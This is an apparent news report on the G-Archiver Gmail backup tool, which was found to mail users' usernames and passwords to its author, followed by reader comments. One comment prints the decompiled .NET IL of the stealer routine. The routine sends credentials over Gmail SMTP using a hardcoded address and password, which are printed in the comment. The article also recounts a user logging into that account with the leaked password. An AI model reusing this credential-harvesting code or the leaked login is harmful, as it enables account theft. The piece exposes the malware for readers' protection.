E-mail archive program gathers Gmail account information as well

In looking for a program to back up his Gmail account, programmer Dustin Brooks found a commercial program that instead copies username and password information, according to a blog on Codinghorror.com.

Over the weekend, Brooks said in an e-mail to CodingHorrror.com that he was looking for a program that would archive his Gmail account onto his local hard drive. He signed up for a program called G-Archiver distributed by Mate Media of Miami, Fla. Brooks says that after installing the program, it didn't do all he was looking for so he decided to reverse engineer the source code using a program called Reflector for .Net.

Inside the source code Brooks found the program author's e-mail address and account password for Gmail. Thinking that was a little strange, Brooks used the hardcoded information to open John Terry's Gmail account. There, Brooks alleges he found 1,777 messages, all of which had username and passwords for people who signed up for the G-Archiver, including his own. In other words, whenever anyone signed up for the program, as Brooks had, a copy of his or her username and password was sent to John Terry's Gmail account.

Hardcoding e-mail addresses isn't new. In a presentation at Black Hat D.C. 2008 a few weeks ago, researchers Nitesh Dhanjani and Billy Rios reported that phishing site creators frequently hardcode e-mail addresses into the code in order to receive copies of the personal information submitted independent of where the Web form is being sent.

Brooks says upon realizing what each of the e-mails contained, he then deleted all the mail and emptied the trash. He then changed the author's password, and reported jterry79@gmail.com's abuse to Google.

On the CodingHorror.com site this morning, Brooks wrote "Granted my actions may have been a little quick and harsh, I was a little upset over the whole deal. I have a lot of personal info in my account along with a stored credit card for Google checkout. I very easily just could have changed my password and been done with it, but I didn't want more people compromising their accounts as well. The only e-mails in this account were usernames/passwords. This wasn't a personal account used for other things."

A number of sites have since removed G-Archiver from their download collection, including CNET Download.com. Attempts to contact Mate Media have so far gone unanswered.

[Mugunth]

Is this true?

All I could find in GArchiver.exe, CheckConnection method was

.method private hidebysig instance void CheckConnection() cil managed
{
// Code size 30 (0x1e)
.maxstack 2
.locals init (class [mscorlib]System.Exception V_0)
IL_0000: nop
.try
{
IL_0001: nop
IL_0002: ldarg.0
IL_0003: ldfld string GMail_Archiver.PopMail::userName
IL_0008: ldarg.0
IL_0009: ldfld string GMail_Archiver.PopMail::password
IL_000e: call void [SM]SM.Mail::CheckConnection(string,
string)
IL_0013: nop
IL_0014: nop
IL_0015: leave.s IL_001c
} // end .try
catch [mscorlib]System.Exception
{
IL_0017: stloc.0
IL_0018: nop
IL_0019: nop
IL_001a: leave.s IL_001c
} // end handler
IL_001c: nop
IL_001d: ret
} // end of method PopMail::CheckConnection



there isn't any code to steal personal data here... Am I missing something?

[Mugunth]

Oh No...! I'm wrong...

There is this file... sm.dll
Which is the real stealer...

.method public hidebysig static void CheckConnection(string a,
string b) cil managed
{
// Code size 224 (0xe0)
.maxstack 5
.locals init (class [System]System.Net.Mail.MailMessage V_0,
class [System]System.Net.Mail.SmtpClient V_1,
class [mscorlib]System.Exception V_2)
IL_0000: nop
.try
{
IL_0001: nop
IL_0002: newobj instance void [System]System.Net.Mail.MailMessage::.ctor()
IL_0007: stloc.0
IL_0008: ldloc.0
IL_0009: callvirt instance class [System]System.Net.Mail.MailAddressCollection [System]System.Net.Mail.MailMessage::get_To()
IL_000e: ldstr "JTerry79@gmail.com"
IL_0013: callvirt instance void [System]System.Net.Mail.MailAddressCollection::Add(string)
IL_0018: nop
IL_0019: ldloc.0
IL_001a: ldstr "JTerry79@gmail.com"
IL_001f: ldstr "JTerry"
IL_0024: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
IL_0029: newobj instance void [System]System.Net.Mail.MailAddress::.ctor(string,
string,
class [mscorlib]System.Text.Encoding)
IL_002e: callvirt instance void [System]System.Net.Mail.MailMessage::set_From(class [System]System.Net.Mail.MailAddress)
IL_0033: nop
IL_0034: ldloc.0
IL_0035: ldstr "Account"
IL_003a: callvirt instance void [System]System.Net.Mail.MailMessage::set_Subject(string)
IL_003f: nop
IL_0040: ldloc.0
IL_0041: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
IL_0046: callvirt instance void [System]System.Net.Mail.MailMessage::set_SubjectEncoding(class [mscorlib]System.Text.Encoding)
IL_004b: nop
IL_004c: ldloc.0
IL_004d: ldstr "Username: "
IL_0052: ldarg.0
IL_0053: call string [mscorlib]System.String::Concat(string,
string)
IL_0058: callvirt instance void [System]System.Net.Mail.MailMessage::set_Body(string)
IL_005d: nop
IL_005e: ldloc.0
IL_005f: dup
IL_0060: callvirt instance string [System]System.Net.Mail.MailMessage::get_Body()
IL_0065: ldstr "\r
Password: "
IL_006a: ldarg.1
IL_006b: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_0070: callvirt instance void [System]System.Net.Mail.MailMessage::set_Body(string)
IL_0075: nop
IL_0076: ldloc.0
IL_0077: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
IL_007c: callvirt instance void [System]System.Net.Mail.MailMessage::set_BodyEncoding(class [mscorlib]System.Text.Encoding)
IL_0081: nop
IL_0082: ldloc.0
IL_0083: ldc.i4.0
IL_0084: callvirt instance void [System]System.Net.Mail.MailMessage::set_IsBodyHtml(bool)
IL_0089: nop
IL_008a: ldloc.0
IL_008b: ldc.i4.2
IL_008c: callvirt instance void [System]System.Net.Mail.MailMessage::set_Priority(valuetype [System]System.Net.Mail.MailPriority)
IL_0091: nop
IL_0092: newobj instance void [System]System.Net.Mail.SmtpClient::.ctor()
IL_0097: stloc.1
IL_0098: ldloc.1
IL_0099: ldstr "JTerry79@gmail.com"
IL_009e: ldstr "bilal482"
IL_00a3: newobj instance void [System]System.Net.NetworkCredential::.ctor(string,
string)
IL_00a8: callvirt instance void [System]System.Net.Mail.SmtpClient::set_Credentials(class [System]System.Net.ICredentialsByHost)
IL_00ad: nop
IL_00ae: ldloc.1
IL_00af: ldc.i4 0x24b
IL_00b4: callvirt instance void [System]System.Net.Mail.SmtpClient::set_Port(int32)
IL_00b9: nop
IL_00ba: ldloc.1
IL_00bb: ldstr "smtp.gmail.com"
IL_00c0: callvirt instance void [System]System.Net.Mail.SmtpClient::set_Host(string)
IL_00c5: nop
IL_00c6: ldloc.1
IL_00c7: ldc.i4.1
IL_00c8: callvirt instance void [System]System.Net.Mail.SmtpClient::set_EnableSsl(bool)
IL_00cd: nop
IL_00ce: ldloc.1
IL_00cf: ldloc.0
IL_00d0: callvirt instance void [System]System.Net.Mail.SmtpClient::Send(class [System]System.Net.Mail.MailMessage)
IL_00d5: nop
IL_00d6: nop
IL_00d7: leave.s IL_00de
} // end .try
catch [mscorlib]System.Exception
{
IL_00d9: stloc.2
IL_00da: nop
IL_00db: nop
IL_00dc: leave.s IL_00de
} // end handler
IL_00de: nop
IL_00df: ret
} // end of method Mail::CheckConnection



Steals user's information and posts them to jterry79.

[basraw]

Great! Now you have violated the DMCA

You are also to be branded as a hacker.

I just hope the feds don't catch you.

[Pixelslave]

Just use any POP3 client as an archiver

Any POP3 client can be used as an archiver for Gmail. It may be overkilled, but there are a lot of free POP3 clients and many of them are from well recognized companies/organization.

[basraw]

DMCA VIOLATION -Dustin Brooks = HACKER

DMCA violated several things here.

1) Breaking into John Terry's EMAIL account. (illegal)

2) REVERSING copyrighted source code ( a violation of the DMCA ).

Throw Dustin Brooks in jail. He's violated the law.

[unknown unknown]

RE

"Breaking into John Terry's EMAIL account. (illegal)"

That's not covered by the DMCA, but it is probably illegal. Though so it harvesting peoples account information without telling them. That makes G-Archiver technically a trojan.

"REVERSING copyrighted source code ( a violation of the DMCA )."

Reverse engineering may violate the license, but it's not necessarily illegal. In fact quite the opposite, it's often perfectly legal as long as software was obtained legitimately. As far as the DMCA goes, it would only break that if he broke copy protection to use Reflector on it.

[shartley123]

so your telling me that it is OK for some jack A*S to Steal your information? this really sounds like your the JACKA*S. If this guy is stealing information(which more then likely is your stuff too) then what else is he doing. the DCMA should never come into play when the guy is stealing information with the use of a program. I hope the guy that is doing it goes to jail, and dustin Brooks, congrats on catching the idiot!!! If the dudes e-mail and password is available in a program, then shame on him and no it isn't illegal, because it is out there for others to get. and BTW do you know your wifes/husbands/boyfriends/girlfriends/ daughters/sons passwords for their e-mails or accounts? if you do you are breaking the law according to you!

[blsith]

Username AND Password

Anyone else find it odd (and sad) that the guy left the username and the password in the code, instead of just having the script email him the information?

[amadensor]

Why name AND password

It had the name and password so that it could use Google's SMTP server. I guess it could have tried to find which SMTP server was already set up for something else, but if they are using only webmail, they may not have anything.

This is yet another definitive argument against running software to which you do not have the source.

[Mugunth]

Name and Password

Google's SMTP server requires you to authenticate yourself with a name and password, before sending any email from that account. The function CheckConnection does precisely that.

Mugunth